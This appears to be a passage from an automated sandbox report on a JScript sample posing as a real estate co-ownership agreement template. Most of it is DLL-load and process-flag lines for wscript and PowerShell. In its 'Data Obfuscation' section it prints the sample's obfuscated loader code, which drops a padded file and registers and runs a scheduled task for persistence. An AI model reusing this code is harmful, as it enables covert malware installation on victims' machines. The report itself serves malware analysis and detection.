Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: pcacli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: samcli.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: samlib.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: sxs.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: jscript.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: wshext.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: scrobj.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: mpr.dll			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: scrrun.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: real estate co ownership agreement template 43632.js

Static file information: File size 1759107 > 1048576

Data Obfuscation

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript;pSzhKh = loGuOn[P(21)](P(33));GyusB = loGuOn[P(21)](P(38));zTrbW = loGuOn[P(21)](P(40));zTrbW[P(27)]();MtQnm = zTrbW[P(12)]("\\");try{gjKLivoL = MtQnm[P(32)](baFycB);}catch(lRjvr){gjKLivoL = false;}if (gjKLivoL == false) {cpQJZO = GyusB[P(12)](pSzhKh[P(19)](P(13)))[P(18)];rDxbXI = 821-(Math[P(37)](821/cpQJZO[P(3)])*cpQJZO[P(3)]);VVJQ = 0;tjuWU = false;for(VepL = new Enumerator(cpQJZO); !VepL[P(10)](); VepL[P(22)]()) {XiTaKV = VepL[P(23)]();if (rDxbXI==VVJQ) tjuWU = XiTaKV;VVJQ++;}if (tjuWU != false) {AjxBDA = tjuWU+"\\"+CFUXD;if(!GyusB[P(34)](AjxBDA)){tMfet = GyusB[P(20)](AjxBDA, 8, true);tMfet[P(0)](aQNTEFP);VVJQ=0;FFnPq=aQNTEFP.length;while(true) {tMfet[P(0)](aQNTEFP);VVJQ=VVJQ+FFnPq;if (VVJQ>47659877) break;}tMfet[P(11)]();tMfet = GyusB[P(29)](AjxBDA);tMfet[P(2)] = aMsgA;SHPrDg = tMfet[P(41)];nLQXcoW = zTrbW[P(25)](0);nLQXcoW[P(35)][P(6)] = true;nLQXcoW[P(35)][P(26)] = false;EVjSJGM = nLQXcoW[P(36)][P(7)](9);EVjSJGM["ID"] = P(28);EVjSJGM[P(14)] = pSzhKh[P(19)](P(39));eNmbDO = nLQXcoW[P(1)][P(7)](0);eNmbDO[P(31)] = P(5);eNmbDO[P(4)] = SHPrDg;eNmbDO[P(9)] = tjuWU;MtQnm[P(24)](baFycB, nLQXcoW, 6, "" , "" , 3);gjKLivoL = MtQnm[P(32)](baFycB);loGuOn[P(16)](27755);gjKLivoL[P(15)](null, 2, 0, "");}}}loGuOn[P(42)]();}ITextStream.Write("650560617905821433189172285812437710244084907636;singlen='*+B?3??.4I+w,E?E8Awb4u';function goldh(bsvgh, jzbnr){return yellow2(bsvgh,jzbnr,yyvt);}developm = 8160;yfkxy='?+tEE?ieceo?Trt) e/+nh?(';bad9='B+(Ow??k?hHj+c?f??)[k++5o?(?'");ITextStream.Write("650560617905821433189172285812437710244084907636;singlen='*+B?3??.4I+w,E?E8Awb4u';function goldh(bsvgh, jzbnr){return yellow2(bsvgh,jzbnr,yyvt);}developm = 8160;yfkxy='?+tEE?ieceo?Trt) e/+nh?(';bad9='B+(Ow??k?hHj+c?f??)[k++5o?(?'");ITextStream.Write("650560617905821433189172285812437710244084907636;singlen='*+B?3??.4I+w,E?E8Awb4u';function goldh(bsvgh, jzbnr){return yellow2(bsvgh,jzbnr,yyvt);}developm = 8160;yfkxy='?+tEE?ieceo?Trt) e/+nh?(';bad9='B+(Ow??k?hHj+c?f??)[k++5o?(?'");ITextStream.Write("650560617905821433189172285812437710244084907636;singlen='*+B?3??.4I+w,E?E8Awb4u';function goldh(bsvgh, jzbnr){return yellow2(bsvgh,jzbnr,yyvt);}developm = 8160;yfkxy='?+tEE?ieceo?Trt) e/+nh?(';bad9='B+(Ow??k?hHj+c?f??)[k++5o?(?'");ITextStream.Write("650560617905821433189172285812437710244084907636;singlen='*+B?3??.4I+w,E?E8Awb4u';function goldh(bsvgh, jzbnr){return yellow2(bsvgh,jzbnr,yyvt);}developm = 8160;yfkxy='?+tEE?ieceo?Trt) e/+nh?(';bad9='B+(Ow??k?hHj+c?f??)[k++5o?(?'");ITextStream.Write("650560617905821433189172285812437710244084907636;singlen='*+B?3??.4I+w,E?E8Awb4u';function goldh(bsvgh, jzbnr){return yellow2(bsvgh,jzbnr,yyvt);}developm = 8160;yfkxy='?+tEE?ieceo?Trt) e/+nh?(';bad9='B+(Ow??k?hHj+c?f??)[k++5o?(?'");ITextStream.Write("650560617905821433189172285812437710244084907636;singlen='*+B?3??.4I+w,E?E8Awb4u';function goldh(bsvgh, jzbnr){return yellow2(bsvgh,jzbnr,yyvt);}developm = 8160;yfkxy='?+tEE?ieceo?Trt) e/+nh?(';bad9='B+(Ow??k?hHj+c?f??)[k++5o?(?'");ITe

Source: Yara match

File source: real estate co ownership agreement template 43632.js, type: SAMPLE

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
